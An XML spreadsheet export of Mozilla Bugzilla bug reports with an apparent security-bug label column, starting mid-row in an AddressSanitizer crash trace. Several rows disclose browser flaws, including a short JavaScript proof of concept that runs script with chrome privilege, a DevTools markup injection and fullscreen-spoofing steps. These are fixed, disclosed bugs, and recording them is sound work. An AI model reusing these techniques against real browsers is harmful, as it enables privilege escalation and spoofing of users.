    #64 0x7f1b52aee318 in RunInternal src/ipc/chromium/src/base/message_loop.cc:215
    #65 0x7f1b52aee318 in RunHandler src/ipc/chromium/src/base/message_loop.cc:208
    #66 0x7f1b52aee318 in MessageLoop::Run() src/ipc/chromium/src/base/message_loop.cc:182
    #67 0x7f1b5217bbcd in nsBaseAppShell::Run() src/widget/xpwidgets/nsBaseAppShell.cpp:163
    #68 0x7f1b4f104adf in XREMain::XRE_main(int, char**, nsXREAppData const*) src/toolkit/xre/nsAppRunner.cpp:3891
    #69 0x7f1b4f105aba in XRE_main src/toolkit/xre/nsAppRunner.cpp:4089
    #70 0x4097bd in do_main src/browser/app/nsBrowserApp.cpp:174
    #71 0x4097bd in main src/browser/app/nsBrowserApp.cpp:279
    #72 0x7f1b5895076c in
0x7f1b334eae80 is located 64 bytes inside of 128-byte region [0x7f1b334eae40,0x7f1b334eaec0)
freed by thread T0 here:
    #0 0x4265e0 in __interceptor_free
    #1 0x7f1b51258f62 in operator= src/../../dist/include/mozilla/mozalloc.h:224
    #2 0x7f1b51258f62 in nsPrintEngine::Release() src/layout/printing/nsPrintEngine.cpp:222
    #3 0x7f1b4f93bd67 in nsDocumentViewer::Show() src/layout/base/nsDocumentViewer.cpp:1938
    #4 0x7f1b4f996957 in nsPresContext::EnsureVisible() src/layout/base/nsPresContext.cpp:1829
    #5 0x7f1b4f9bc284 in PresShell::UnsuppressAndInvalidate() src/layout/base/nsPresShell.cpp:3579
    #6 0x7f1b51a17d24 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, tag_nsresult) src/docshell/base/nsDocShell.cpp:6514
    #7 0x7f1b51a15018 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, tag_nsresult) src/docshell/base/nsDocShell.cpp:6342
    #8 0x7f1b51a154ac in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, tag_nsresult) src/docshell/base/nsDocShell.cpp:6349
    #9 0x7f1b51a74a42 in nsDocLoader::doStopDocumentLoad(nsIRequest*, tag_nsresult) src/uriloader/base/nsDocLoader.cpp:885
    #10 0x7f1b51a72ab7 in nsDocLoader::DocLoaderIsEmpty(bool) src/uriloader/base/nsDocLoader.cpp:775
    #11 0x7f1b51a73e5b in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) src/uriloader/base/nsDocLoader.cpp:659
    #12 0x7f1b51a74659 in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, tag_nsresult) src/uriloader/base/nsDocLoader.cpp:663
    #13 0x7f1b500f7622 in nsDocument::DoUnblockOnload() src/content/base/src/nsDocument.cpp:6972
    #14 0x7f1b500dec17 in nsDocument::DispatchContentLoadedEvents() src/content/base/src/nsDocument.cpp:4220
    #15 0x7f1b50114586 in nsRunnableMethodImpl&lt;void (nsDocument::*)(), true&gt;::Run() src/../../../dist/include/nsThreadUtils.h:367
previously allocated by thread T0 here:
    #0 0x4266a0 in malloc
    #1 0x7f1b56b1b148 in moz_xmalloc src/memory/mozalloc/mozalloc.cpp:54
    #2 0x7f1b52a9f836 in NS_InvokeByIndex_P src/xpcom/reflect/xptcall/src/md/unix/xptcinvoke_x86_64_unix.cpp:162
    #3 0x7f1b5181ba43 in Invoke src/js/xpconnect/src/XPCWrappedNative.cpp:3081
    #4 0x7f1b5181ba43 in CallMethodHelper src/js/xpconnect/src/XPCWrappedNative.cpp:2415
    #5 0x7f1b5181ba43 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) src/js/xpconnect/src/XPCWrappedNative.cpp:2381
    #6 0x7f1b51830018 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1488
    #7 0x7f1b53da19dd in native src/js/src/jscntxtinlines.h:372
    #8 0x7f1b53da19dd in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) src/js/src/jsinterp.cpp:389
    #9 0x7f1b53d91dd1 in js::Interpret(JSContext*, js::StackFrame*, js::InterpMode) src/js/src/jsinterp.cpp:2348
    #10 0x7f1b53d7d8ee in js::RunScript(JSContext*, JS::Handle&lt;JSScript*&gt;, js::StackFrame*) src/js/src/jsinterp.cpp:346
    #11 0x7f1b53da18d8 in js::InvokeKernel(JSContext*, JS::CallArgs, js::MaybeConstruct) src/js/src/jsinterp.cpp:404
Shadow byte and word:
  0x1fe36669d5d0: fd
  0x1fe36669d5d0: fd fd fd fd fd fd fd fd
More shadow bytes:
  0x1fe36669d5b0: 00 00 00 00 00 00 fb fb
  0x1fe36669d5b8: fa fa fa fa fa fa fa fa
  0x1fe36669d5c0: fa fa fa fa fa fa fa fa
  0x1fe36669d5c8: fd fd fd fd fd fd fd fd
=&gt;0x1fe36669d5d0: fd fd fd fd fd fd fd fd
  0x1fe36669d5d8: fa fa fa fa fa fa fa fa
  0x1fe36669d5e0: fa fa fa fa fa fa fa fa
  0x1fe36669d5e8: fd fd fd fd fd fd fd fd
  0x1fe36669d5f0: fd fd fd fd fd fd fd fd
Stats: 144M malloced (143M for red zones) by 461053 calls
Stats: 11M realloced by 45165 calls
Stats: 117M freed by 318690 calls
Stats: 82M really freed by 244573 calls
Stats: 175M (44883 full pages) mmaped in 332 calls
  mmaps   by size class: 7:180180; 8:55269; 9:16368; 10:7665; 11:4845; 12:2560; 13:832; 14:416; 15:208; 16:728; 17:148; 18:14; 19:6; 20:8; 21:3;
  mallocs by size class: 7:316387; 8:89162; 9:27422; 10:11100; 11:8505; 12:4084; 13:1726; 14:801; 15:301; 16:1316; 17:202; 18:24; 19:8; 20:12; 21:3;
  frees   by size class: 7:221395; 8:57159; 9:19982; 10:7245; 11:6176; 12:2957; 13:1511; 14:656; 15:190; 16:1190; 17:194; 18:18; 19:6; 20:8; 21:3;
  rfrees  by size class: 7:174666; 8:43529; 9:11861; 10:5716; 11:4350; 12:1749; 13:1116; 14:492; 15:152; 16:753; 17:169; 18:10; 19:2; 20:5; 21:3;
Stats: malloc large: 1866 small slow: 4648
==12857== ABORTING</t>
        </is>
      </c>
      <c r="X1935" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1936">
      <c r="A1936" t="n">
        <v>903885</v>
      </c>
      <c r="B1936" t="inlineStr">
        <is>
          <t>2013-08-11 14:18:08 -0700</t>
        </is>
      </c>
      <c r="C1936" t="inlineStr">
        <is>
          <t>Hostname matching code violates RFC 6125 for IDNA</t>
        </is>
      </c>
      <c r="D1936" t="inlineStr">
        <is>
          <t>2014-09-12 11:22:39 -0700</t>
        </is>
      </c>
      <c r="E1936" t="n">
        <v>1</v>
      </c>
      <c r="F1936" t="n">
        <v>1</v>
      </c>
      <c r="G1936" t="n">
        <v>3</v>
      </c>
      <c r="H1936" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1936" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J1936" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K1936" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L1936" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1936" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1936" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1936" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1936" t="inlineStr">
        <is>
          <t>[adv-main29+]</t>
        </is>
      </c>
      <c r="Q1936" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1936" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1936" t="inlineStr">
        <is>
          <t>3.16</t>
        </is>
      </c>
      <c r="T1936" t="n">
        <v>1</v>
      </c>
      <c r="U1936" t="n">
        <v>0</v>
      </c>
      <c r="V1936" t="n">
        <v>36</v>
      </c>
      <c r="W1936" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0 (Beta/Release)
Build ID: 20130803192641
Steps to reproduce:
The implementation of cert_TestHostName() at http://hg.mozilla.org/mozilla-central/file/3d20597e0a07/security/nss/lib/certdb/certdb.c#l1384 does not handle IDNA domain prefixes according to RFC 6125, section 6.4.3 "Checking of Wildcard Certificates". http://tools.ietf.org/html/rfc6125#section-6.4.3 
Actual results:
A CN or subjectAltName DNS wildcard such as 'x*.example.org' should not match a IDNA A-label like 'xn--www-una.example.org'.
Expected results:
cert_TestHostName() should not use wildcard matching if the first fragment of a hostname is an IDNA A-label. Chromium has such a special case in http://src.chromium.org/viewvc/chrome/trunk/src/net/cert/x509_certificate.cc?revision=212341#l640</t>
        </is>
      </c>
      <c r="X1936" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1937">
      <c r="A1937" t="n">
        <v>1361811</v>
      </c>
      <c r="B1937" t="inlineStr">
        <is>
          <t>2017-05-03 11:54:30 -0700</t>
        </is>
      </c>
      <c r="C1937" t="inlineStr">
        <is>
          <t>Remove google.com from TopSites</t>
        </is>
      </c>
      <c r="D1937" t="inlineStr">
        <is>
          <t>2017-05-09 08:06:46 -0700</t>
        </is>
      </c>
      <c r="E1937" t="n">
        <v>1</v>
      </c>
      <c r="F1937" t="n">
        <v>1</v>
      </c>
      <c r="G1937" t="n">
        <v>2</v>
      </c>
      <c r="H1937" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1937" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J1937" t="inlineStr">
        <is>
          <t>Home screen</t>
        </is>
      </c>
      <c r="K1937" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1937" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M1937" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N1937" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1937" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1937" t="inlineStr">
        <is>
          <t>[mobileAS]</t>
        </is>
      </c>
      <c r="Q1937" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1937" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1937" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1937" t="n">
        <v>1</v>
      </c>
      <c r="U1937" t="n">
        <v>0</v>
      </c>
      <c r="V1937" t="n">
        <v>6</v>
      </c>
      <c r="W1937" t="inlineStr">
        <is>
          <t>Google.com search results usually ranks pretty high in the frecency calculations. And because most of the time you don't actually go to the google homepage some random google search result ends up being your first topsite. 
It makes sense to just remove google search from top sites. Other google properties like docs and mail should still become topsites.</t>
        </is>
      </c>
      <c r="X1937" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1938">
      <c r="A1938" t="n">
        <v>796866</v>
      </c>
      <c r="B1938" t="inlineStr">
        <is>
          <t>2012-10-02 03:10:42 -0700</t>
        </is>
      </c>
      <c r="C1938" t="inlineStr">
        <is>
          <t>Arbitrary code execution from Style Inspector</t>
        </is>
      </c>
      <c r="D1938" t="inlineStr">
        <is>
          <t>2024-05-30 07:33:41 -0700</t>
        </is>
      </c>
      <c r="E1938" t="n">
        <v>1</v>
      </c>
      <c r="F1938" t="n">
        <v>1</v>
      </c>
      <c r="G1938" t="n">
        <v>3</v>
      </c>
      <c r="H1938" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1938" t="inlineStr">
        <is>
          <t>DevTools</t>
        </is>
      </c>
      <c r="J1938" t="inlineStr">
        <is>
          <t>Inspector</t>
        </is>
      </c>
      <c r="K1938" t="inlineStr">
        <is>
          <t>15 Branch</t>
        </is>
      </c>
      <c r="L1938" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1938" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1938" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1938" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1938" t="inlineStr">
        <is>
          <t>[fixed-in-fx-team][adv-track-main17+][adv-track-esr17+]</t>
        </is>
      </c>
      <c r="Q1938" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1938" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1938" t="inlineStr">
        <is>
          <t>Firefox 19</t>
        </is>
      </c>
      <c r="T1938" t="n">
        <v>1</v>
      </c>
      <c r="U1938" t="n">
        <v>0</v>
      </c>
      <c r="V1938" t="n">
        <v>31</v>
      </c>
      <c r="W1938" t="inlineStr">
        <is>
          <t>Created attachment 666916
An exploit for Windows, opens C:\Windows\System32\calc.exe
It is possible to execute arbitrary code when a user inspects computed styles on a malicious website containing a specially crafted style sheet.
The problem lies in the function PropertyView_refresh in CssHtmlTree.jsm, which writes user-controlled CSS values to innerHTML without sanitizing the input. This paves the way for an HTML markup injection in the privileged context of chrome://browser/content/devtools/csshtmltree.xul</t>
        </is>
      </c>
      <c r="X1938" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1939">
      <c r="A1939" t="n">
        <v>289083</v>
      </c>
      <c r="B1939" t="inlineStr">
        <is>
          <t>2005-04-05 01:03:26 -0700</t>
        </is>
      </c>
      <c r="C1939" t="inlineStr">
        <is>
          <t>|new Script()| causes arbitrary code execution</t>
        </is>
      </c>
      <c r="D1939" t="inlineStr">
        <is>
          <t>2007-04-01 14:37:25 -0700</t>
        </is>
      </c>
      <c r="E1939" t="n">
        <v>1</v>
      </c>
      <c r="F1939" t="n">
        <v>1</v>
      </c>
      <c r="G1939" t="n">
        <v>3</v>
      </c>
      <c r="H1939" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1939" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1939" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K1939" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1939" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1939" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N1939" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1939" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1939" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q1939" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1939" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1939" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1939" t="n">
        <v>1</v>
      </c>
      <c r="U1939" t="n">
        <v>0</v>
      </c>
      <c r="V1939" t="n">
        <v>15</v>
      </c>
      <c r="W1939" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
Even though a |Script Object| is created by a web page, when it is called
from chrome JS, it is executed with chrome privilege.
If a web page redefines |localName getter| of a DOM node, such as following.
  document.body.__defineGetter__("localName", function() {
    return { toLowerCase : new Script("alert(Components.stack);") };
  });
Then, if there is a code such as the following code in chrome JS,
"alert(Components.stack);" will be executed with chrome privilege.
  local_name = event.target.localName.toLowerCase();
In addition, |typeof new Script()| is "function" in Firefox1.0.2 and
Mozilla1.7.6 (it is "object" in latest-trunk), thus, it is easier to write a
exploit code, such as following.
  document.body.__defineGetter__("localName", new
Script("alert(Components.stack);"));
And an attacker can exploit *without* user interaction, by using DOMLinkAdded Event.
I have confirmed that the following testcases work in:
[Firefox]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317
Firefox/1.0.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404
Firefox/1.0.3
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050404
Firefox/1.0+
[Mozilla Suite]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050404
Reproducible: Always
Steps to Reproduce:</t>
        </is>
      </c>
      <c r="X1939" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1940">
      <c r="A1940" t="n">
        <v>928643</v>
      </c>
      <c r="B1940" t="inlineStr">
        <is>
          <t>2013-10-19 08:19:43 -0700</t>
        </is>
      </c>
      <c r="C1940" t="inlineStr">
        <is>
          <t>Disable MOZ_B2G_RIL on Flatfish</t>
        </is>
      </c>
      <c r="D1940" t="inlineStr">
        <is>
          <t>2014-07-18 14:50:32 -0700</t>
        </is>
      </c>
      <c r="E1940" t="n">
        <v>1</v>
      </c>
      <c r="F1940" t="n">
        <v>1</v>
      </c>
      <c r="G1940" t="n">
        <v>6</v>
      </c>
      <c r="H1940" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1940" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J1940" t="inlineStr">
        <is>
          <t>RIL</t>
        </is>
      </c>
      <c r="K1940" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1940" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M1940" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N1940" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1940" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1940" t="inlineStr">
        <is>
          <t>[Flatfish only][developer+][POVB]</t>
        </is>
      </c>
      <c r="Q1940" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1940" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1940" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1940" t="n">
        <v>1</v>
      </c>
      <c r="U1940" t="n">
        <v>0</v>
      </c>
      <c r="V1940" t="n">
        <v>40</v>
      </c>
      <c r="W1940" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #920551 +++</t>
        </is>
      </c>
      <c r="X1940" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1941">
      <c r="A1941" t="n">
        <v>11242</v>
      </c>
      <c r="B1941" t="inlineStr">
        <is>
          <t>1999-08-04 04:21:41 -0700</t>
        </is>
      </c>
      <c r="C1941" t="inlineStr">
        <is>
          <t>A Mail is sent more than once to a person [Patch]</t>
        </is>
      </c>
      <c r="D1941" t="inlineStr">
        <is>
          <t>2017-02-03 12:15:38 -0800</t>
        </is>
      </c>
      <c r="E1941" t="n">
        <v>1</v>
      </c>
      <c r="F1941" t="n">
        <v>1</v>
      </c>
      <c r="G1941" t="n">
        <v>4</v>
      </c>
      <c r="H1941" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1941" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1941" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K1941" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1941" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1941" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1941" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1941" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1941" t="inlineStr"/>
      <c r="Q1941" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1941" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S1941" t="inlineStr">
        <is>
          <t>Bugzilla old</t>
        </is>
      </c>
      <c r="T1941" t="n">
        <v>1</v>
      </c>
      <c r="U1941" t="n">
        <v>0</v>
      </c>
      <c r="V1941" t="n">
        <v>5</v>
      </c>
      <c r="W1941" t="inlineStr">
        <is>
          <t>A mail is sent more than once to a person if the address is owner/qa and
mentioned in cc:
The patch fixes this.</t>
        </is>
      </c>
      <c r="X1941" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1942">
      <c r="A1942" t="n">
        <v>660502</v>
      </c>
      <c r="B1942" t="inlineStr">
        <is>
          <t>2011-05-28 17:40:02 -0700</t>
        </is>
      </c>
      <c r="C1942" t="inlineStr">
        <is>
          <t>[SECURITY] Temporary files for uploaded attachments are not deleted on Windows (again)</t>
        </is>
      </c>
      <c r="D1942" t="inlineStr">
        <is>
          <t>2011-08-05 17:33:31 -0700</t>
        </is>
      </c>
      <c r="E1942" t="n">
        <v>1</v>
      </c>
      <c r="F1942" t="n">
        <v>1</v>
      </c>
      <c r="G1942" t="n">
        <v>4</v>
      </c>
      <c r="H1942" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1942" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J1942" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K1942" t="inlineStr">
        <is>
          <t>3.6</t>
        </is>
      </c>
      <c r="L1942" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1942" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1942" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1942" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1942" t="inlineStr">
        <is>
          <t>[Bugzilla 3.6rc1 and older not affected]</t>
        </is>
      </c>
      <c r="Q1942" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1942" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1942" t="inlineStr">
        <is>
          <t>Bugzilla 3.6</t>
        </is>
      </c>
      <c r="T1942" t="n">
        <v>1</v>
      </c>
      <c r="U1942" t="n">
        <v>0</v>
      </c>
      <c r="V1942" t="n">
        <v>14</v>
      </c>
      <c r="W1942" t="inlineStr">
        <is>
          <t>We already fixed this problem in Bugzilla 2.20.5 in bug 414002, and it's still working fine in Bugzilla 3.2 and 3.4, but we regressed this again in Bugzilla 3.6. No idea so far what regressed this.
As a user having local access to the server can access the Temp\ directory on Windows, attachments which are uploaded to security bugs or marked as private are still accessible to such users, even if they cannot access them using Bugzilla.</t>
        </is>
      </c>
      <c r="X1942" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1943">
      <c r="A1943" t="n">
        <v>1756388</v>
      </c>
      <c r="B1943" t="inlineStr">
        <is>
          <t>2022-02-20 21:38:21 -0800</t>
        </is>
      </c>
      <c r="C1943" t="inlineStr">
        <is>
          <t>requestFullscreen on iFrame from different origin able to not show fullscreen notification toast</t>
        </is>
      </c>
      <c r="D1943" t="inlineStr">
        <is>
          <t>2024-05-30 10:54:10 -0700</t>
        </is>
      </c>
      <c r="E1943" t="n">
        <v>1</v>
      </c>
      <c r="F1943" t="n">
        <v>1</v>
      </c>
      <c r="G1943" t="n">
        <v>3</v>
      </c>
      <c r="H1943" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1943" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1943" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1943" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1943" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1943" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1943" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1943" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1943" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main101+][adv-esr91.10+]</t>
        </is>
      </c>
      <c r="Q1943" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1943" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S1943" t="inlineStr">
        <is>
          <t>102 Branch</t>
        </is>
      </c>
      <c r="T1943" t="n">
        <v>1</v>
      </c>
      <c r="U1943" t="n">
        <v>0</v>
      </c>
      <c r="V1943" t="n">
        <v>19</v>
      </c>
      <c r="W1943" t="inlineStr">
        <is>
          <t>Created attachment 9264782
iframegcloud.html
After trigger `requestFullscreen` on iFrame from different origin, then click the iFrame to navigate the iFrame url, interestingly after browser exit the fullscreen mode, the iFrame content escaped to parent page.
It seems the browser is improperly exit the fullscreen mode, the page still looks on fullscreen mode, but with visible address bar and toolbar. Interestingly when in that situation, after trigger `requestFullscreen` the browser goes into fullscreen without fullscreen notification toast.
## Tested on:
- Firefox 97.0.1 (64-bit) on Windows 11
- Firefox Nightly 99.0a1 (2022-02-20) (64-bit) on Windows 11
## Steps to reproduce:
1. Visit attached iframegcloud.html
2. Click anywhere inside the iFrame
3. Click "AAA" href text 
4. Click Spoof page
5. Browser goes fullscreen without fullscreen notification toast</t>
        </is>
      </c>
      <c r="X1943" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1944">
      <c r="A1944" t="n">
        <v>54458</v>
      </c>
      <c r="B1944" t="inlineStr">
        <is>
          <t>2000-09-27 18:36:33 -0700</t>
        </is>
      </c>
      <c r="C1944" t="inlineStr">
        <is>
          <t>DYNAPI - Tracking for DanSteinman, dynlayer, dynduo</t>
        </is>
      </c>
      <c r="D1944" t="inlineStr">
        <is>
          <t>2015-04-19 23:39:42 -0700</t>
        </is>
      </c>
      <c r="E1944" t="n">
        <v>1</v>
      </c>
      <c r="F1944" t="n">
        <v>1</v>
      </c>
      <c r="G1944" t="n">
        <v>6</v>
      </c>
      <c r="H1944" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1944" t="inlineStr">
        <is>
          <t>Tech Evangelism Graveyard</t>
        </is>
      </c>
      <c r="J1944" t="inlineStr">
        <is>
          <t>English US</t>
        </is>
      </c>
      <c r="K1944" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1944" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1944" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1944" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1944" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1944" t="inlineStr">
        <is>
          <t>[author]</t>
        </is>
      </c>
      <c r="Q1944" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1944" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1944" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1944" t="n">
        <v>1</v>
      </c>
      <c r="U1944" t="n">
        <v>0</v>
      </c>
      <c r="V1944" t="n">
        <v>14</v>
      </c>
      <c r="W1944" t="inlineStr">
        <is>
          <t>The above URL has a list of web sites that were built using Dan Steinman's 
Nav4/IE4 XBDHTML API. (Look under "Sites Using DynDuo code:") It would be great 
if someone could evangelize each one of these sites about the need to upgrade so 
that they're aware.</t>
        </is>
      </c>
      <c r="X1944" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1945">
      <c r="A1945" t="n">
        <v>1606752</v>
      </c>
      <c r="B1945" t="inlineStr">
        <is>
          <t>2020-01-02 16:25:33 -0800</t>
        </is>
      </c>
      <c r="C1945" t="inlineStr">
        <is>
          <t>"This revision is already under review"</t>
        </is>
      </c>
      <c r="D1945" t="inlineStr">
        <is>
          <t>2020-06-29 02:51:13 -0700</t>
        </is>
      </c>
      <c r="E1945" t="n">
        <v>1</v>
      </c>
      <c r="F1945" t="n">
        <v>1</v>
      </c>
      <c r="G1945" t="n">
        <v>7</v>
      </c>
      <c r="H1945" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1945" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J1945" t="inlineStr">
        <is>
          <t>moz-phab</t>
        </is>
      </c>
      <c r="K1945" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1945" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1945" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1945" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1945" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1945" t="inlineStr"/>
      <c r="Q1945" t="inlineStr">
